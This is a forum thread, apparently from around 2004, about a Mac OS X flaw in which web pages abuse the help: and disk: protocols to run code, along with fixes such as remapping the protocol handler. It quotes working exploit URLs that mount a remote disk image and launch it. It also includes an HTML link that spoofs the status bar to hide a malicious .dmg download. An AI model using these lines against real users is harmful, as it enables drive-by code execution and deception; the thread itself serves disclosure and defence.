[kampl]

Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.

[CharlesS]

Originally posted by kampl:
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.

Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.

[theolein]

Originally posted by kampl:
Another vulnerability that requires the enduser to be an ass-clown in order to be effective? Surely you jest.....

Move along, nothing to see here.

This is not the case at all. A malicious site can do all this, with any OSX browser, without you doing ANYTHING at all. You just have to load the page and it's got you. This is in no way similar to the other recent hoaxes or trojans that require the user to do something.

[StacyK]

I'm glad too.

If for some reason you don't want to use MoreInternet, this fix can also be accomplished using the preferences pane in IE 5.2, that is if you are not such an Apple zealot that you deleted that ages ago. Once you set it there the change is good for Safari too.

Originally posted by Diggory Laycock:

MoreInternet makes this relatively easy - I'm glad to help.

[Mr Scruff]

Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...

[Simon]

No offense to Mr Scruff here, but I strongly advise everybody to look at the HTML source of the files that are linked to in this discussion before they click the link and run real code.

To pros this is certainly obvious, but maybe the less experienced users would just like to see a demo of the exploit and could run into problems if some sucker posts a "demo" link that turns out to be really malicious.

Here's what to do: Download the linked file with a CLI tool like curl or wget (so that it doesn't get executed by any helper app) and then look at the file with a simple text editor like pico, emacs, less or more (so that the you see the raw HTML code rather than the HTML). If you don't know what all this means you would rather not click on any such link at all. Chances are somebody could take advantage of the situation and really screw you.

[Simon]

I just reread my post and realized that it doesn't make sense.

The users that know the CLI tools involved probably know enough to not just click on any posted link.

The users who don't know the CLI tools can probably also not judge if the code is just a "good" demo or actually really malicious. I suggest these people should avoid clicking on these links altogether at least if they can't 100% trust the source. Apple.com should post a demo.

But, here's an easy to follow way to check the so-called demo links:
- In Safari right-lick on the link and save the linked file to your disk ("Save Linked File as...")
- Open the downloaded file from within a text app that will display the raw text and not the rendered HTML. TextEdit does not work because it renders right away. AppleWorks does work. I don't know about Word since I don't use it.
- Look for a line containing "help:runscript="

If you do not understand what this line does or if you are not 100% sure the line only demonstrates inoffensive things you should never click on the link and run the script.

[Love Calm Quiet]

I've been reading this thread for days, and no one seems to present an effective argument other than that this is a VERY serious security hole.

Isn't it extremely distressing that Apple hasn't taken any public action, made a statement, issued a warning?

Would someone more knowledgeable among you word what warning(s) seem at present to be most appropriate?

a) "Uncheck 'Open safe files...' " ?

b) "Even after (a), don't click on any hot links on sites you don't trust 100%" ?

[ I'd like to see if there agreement as to what self-protective steps are needed as of 10.3.3. ]

[Simon]

Originally posted by Love Calm Quiet:
what warning(s) seem at present to be most appropriate?

Here's my 1-2-3 suggestion:

Step 1) Download More Internet and use it to set Chess.app as the default helper app for the protocol "help" as noted earlier in this thread

Step 2) Send e-mail to Apple and tell them this needs to be fixed ASAP!

Step 3) Be careful. Do not trust everybody. Think before clicking.



P.S. Even if we assume Apple will fix their ridiculous mistake someday, step 3 will always remain valid.

[JLL]

Originally posted by Mr Scruff:
Here's another demo that doesn't involve mounting a .dmg

WARNING: Clicking the below link will cause a non malicious command to be run on your system.

http://bronosky.com/pub/AppleScript.htm

Not good...

Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)

[Mr Scruff]

Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)

The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specifiy arguments (since it does the equivalent of double clicking it in the finder).

I don't think there are any commands that do any damage when run without any arguments.

[mbryda]

Originally posted by Link:
The difference between apple and microsoft is Microsoft is a valued, and respected company by the masses.

That's hilarious. M$ not respected by the masses. Every new worm and virus that comes out erodes that perception. If anything, people are starting to look at other options next time it comes time to replace their hardware/software.

Each upgrade is a harder and harder sell for M$. Look at M$'s stock price - it's lower than Apple's. Not much value there.

[theolein]

Originally posted by JLL:
Except you really can't do any harm that way. As you write yourself:

(This one doesn't work because spaces cannot be used in the command string)

Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?

[[APi]TheMan]

Originally posted by Mr Scruff:
The demo isn't mine, but looking at it again, you're right. The technique given still only allows you to run an arbitrary file (which in this case happens to be a CL tool) but not to specifiy arguments (since it does the equivalent of double clicking it in the finder).

I don't think there are any commands that do any damage when run without any arguments.

... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism. This is scary when you begin to consider the idea mentioned on the above website where unsolicited software could be installed, such as a "Free AOL Trial."

Also, a simple JavaScript could hide the destination URL of a link in some browsers as such:

<a href="disk://server.somehacker.com/malicious.dmg" onMouseOver="window.status='http://www.apple.com/'; return true">Click here to go to Apple's homepage</a>

In my tests I couldn't get Safari to utilize my status bar code, but Camino and Firefox did. One plus is that Camino has an option in preferences to prevent sites from changing the status bar in the Web Features section. Just one more thing to be careful of I suppose. Welcome to the internet, boys and girls.

Also, I set my protocol helper for "help:" to TextEdit, Chess takes too long to open on my mediocre speed G4.

[Developer]

What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?

[JLL]

Originally posted by [APi]TheMan:
... but it can point to a script on a disk image with a known path that the hacker had previously (and silently) mounted via the disk:// mechanism.

Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.

[[APi]TheMan]

Originally posted by JLL:
Yep, but then the method isn't different from the others. The point about the "new" method was that you didn't need to mount an image.

Ah-hah, so it is! Dually noted

[JLL]

Originally posted by theolein:
Has this been tried with "%20" URL encoding for spaces or with the "%22" encoding for quotes in case the command and arguments need to be quoted?

Doesn't work.

[CharlesS]

Originally posted by Developer:
What about this:

telnet://-n%2fApplications%2ftestfile

Found in the AppleInsider forums.

Is this a security threat? If so, is it related?

It's not related, but it could potentially be a problem. It would require a bit of work, though - compromising someone's machine with this would not be effortless like it is with the hole being discussed in this thread.

[Love Calm Quiet]

Despite doing something dumb I (luckily) didn't wipe my home directory:

With MacNN reporting eWeek story on the OS X vulnerability, I followed the links to Isophonic's "patch". Stupidly I clicked on the first link (thinking it would explain more, and not noticing is was a .dmg):

"Don't Go There, GURLfriend 1.0 18 May 2004
We've just released Don't Go There, GURLfriend! 1.0 . DGTGF is an application you can use to patch away the OS X exploit found at http://bronosky.com/pub/AppleScript.htm quickly and efortlessly. Miroku Hotei, Ollie Wagner"

So... it mounts dmg, launches Help and Terminal, and completes the Terminal command.

I have no idea what "patch" was installed -- but it sure was a lesson in how readily my Safari browsing could turn over complete control to unknown scripting. (even though I had unchecked "open safe files" upon download in the Safari prefs.

Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?

[Developer]

Originally posted by Love Calm Quiet:
Comments on what other settings I could have changed to prevent the downloading, mounting, and execution of a .dmg?

What I suggest:

Download and run MisFox (a program to change Internet preferences of the OS by the author of iCab):

http://www.clauss-net.de/misfox/misfox.html

click the Protocol Helpers tab and find the entry for the help: protocol. It will be set to Help Viewer. Change the entry to some other program like Chess. Should you encounter the exploit simply Chess will run instead of Help Viewer and no scripts will be executed.

When Apple has a fix for the problem, before you install the update run MisFox again and set the help: protocol back to Help Viewer (it's in /System/Library/Core Services/).

I suggest you do not attempt to install any fixes that try to edit the OpnApp scripts or delete the MacHelp.help folder. They do not completely protect from this vulnerability and are not easily to reverse.

[CharlesS]

Meh, use More Internet instead of MisFox. It's developed by a member these boards, and comes in a proper DMG file instead of a SIT.

[catsdorule]

Um whats with all the complicated fixes jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.

[utidjian]

Originally posted by CharlesS:
Meh, use More Internet instead of MisFox. It's developed by a member these boards, and comes in a proper DMG file instead of a SIT.

Heh... well if the link to the download is setup correctly all one has to do is click on it and it will install it self! *rimshot*

[kampl]

Originally posted by CharlesS:
Yeah, only ass-clowns surf the Internet. You know, since you can initiate a JavaScript on one page that does all this just from clicking on a link.

Then I guess I'm in good company. In any event, I could see this being used for phishing style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user I'm not worrying about it, my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.

[theolein]

Originally posted by kampl:
Then I guess I'm in good company. In any event, I could see this being used for phishing style attacks and not much else. Similar to vulns for IE not that long ago. Perhaps if a trusted site were infiltrated this would be a problem. Being that it runs in the context of the user I'm not worrying about it, my system will not be taken out of action by this and anything important is backed up offline. *shrug* Don't really care, a timely fix would be nice though.

There are quite a lot of sites, mainly spammers' sites, sites of the type that used to download diallers onto your PC via IE, sites that downloaded spyware onto your PC via IE and porn sites that would love something as easy to implement as this. The site that wants to delete your data is rare, the site that wants to use you for their profit isn't.

[Groovy]

Originally posted by catsdorule:
Um whats with all the complicated fixes jeez....

OLOLL!! i know! delet erry script on teh comuter!

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.

IMHO that is not the best way because you lose help in apps you do want it.

IMHO the best way is to DL "More Internet" system pref and have the help: protocol
point to chess etc... That stops url abuse but lets already on mac apps access help.

I have tested it and it works well AND with "More Internet" system pref you can
do OTHER cools things also like add hotline: protocol and have those links
launch that app and connect to a server. (just an example)

[Spliffdaddy]

Did anyone bother to check and see if the 'Chess' app has a security hole?

[sniffer]

Originally posted by catsdorule:

sudo chmod 000 /System/Library/CoreServices/Help\ Viewer.app

Proper temp fix.

What happen if you run repair permissions with disk util? What happen if you want to read help files? ( )

[theolein]

Originally posted by Spliffdaddy:
Did anyone bother to check and see if the 'Chess' app has a security hole?

That would be the riot of the day, if it turned out that Chess.app had a buffer overflow vulnerability: Queen to A6 -> joo R 0\/\/n3D N00b

[theolein]

Actually, since it's been a number of days since this has become public knowledge (and Apple knows about this for sure) I wonder just how long the people at Cupertino are going to take to issue a security update on this one.

[bygimis]

If you can embed these help URL's in HTML e-mail?

In Pather HTML mail i Mail.app is rendered by WebCore, and so could suffer the same problem....

This would allow you to e-mail someone a HTML e-mail, and embed code that could run arbitary code... find a way of saving an attachment automatically using Applescript, then execute it, hook into the Address Book API and send to all, and you have a classic MS style virus.

[mbotta]

Question: suppose Apple comes with a fix and we can all sigh a collective breath of relief, how do you re-select Help as the help:// helper app?

Help? I mean, I don't see it as a selectable app in the Internet Explorer prefs.

Cheers,

mbotta

[Developer]

Originally posted by mbotta:
Question: suppose Apple comes with a fix and we can all sigh a collective breath of relief, how do you re-select Help as the help:// helper app?

http://forums.macnn.com/showthread.p...=3#post1993117

[Groovy]

have you all seen this?



"An example of a variation that doesn't require that a disk image be mounted or that a
malicious script be located on the user's computer is available here. The example at that
URL uses JavaScript to take advantage of a help URL. NOTE: Accessing that URL will open
Terminal and run a harmless example of the "du" (disk usage) command in order to
demonstrate how a help URL could be used to execute a Terminal command without the
user needing to download any files. Accessing the page is safe at the time of publication
of this story."

to see how it works the below link. It will do a harmless "du" when you go there
to show you if you are vulnerable It shows all the details on how it was done
and how to plug the hole. I have since changed "help:" protocol to point
to the chess app and that stops it and the other variations.


http://bronosky.com/pub/AppleScript.htm

[theolein]

Originally posted by Groovy:
have you all seen this?



.......


http://bronosky.com/pub/AppleScript.htm

RTFT

[eddiecatflap]

..oh god , i'm starting to miss os-9 now

[Simon]

Originally posted by eddiecatflap:
..oh god , i'm starting to miss os-9 now

I think we've been there before.

Let go, it's over.

[turtle777]

Originally posted by CharlesS:

These two links will execute the malware with 'safe' files turned off:

disk://fundisom.com/owned/owned.dmg
help:runscript=MacHelp.help/Contents/Resources/English.lproj/shrd/OpnApp.scpt%20string='Volumes:ww:owned.app'

GOD DAMN PIECE OF SHIT.

I AGREE.

This is the first time that an Apple bug / exploit scares me.
That is just too easy to implement and abuse !

Apple, fix this QUICK !

No HTML code should ever be able to execute a script !

-t

[sniffer]

Originally posted by turtle777:

No HTML code should ever be able to execute a script !

At least no execution of "scripts" outside the browser .. [ ]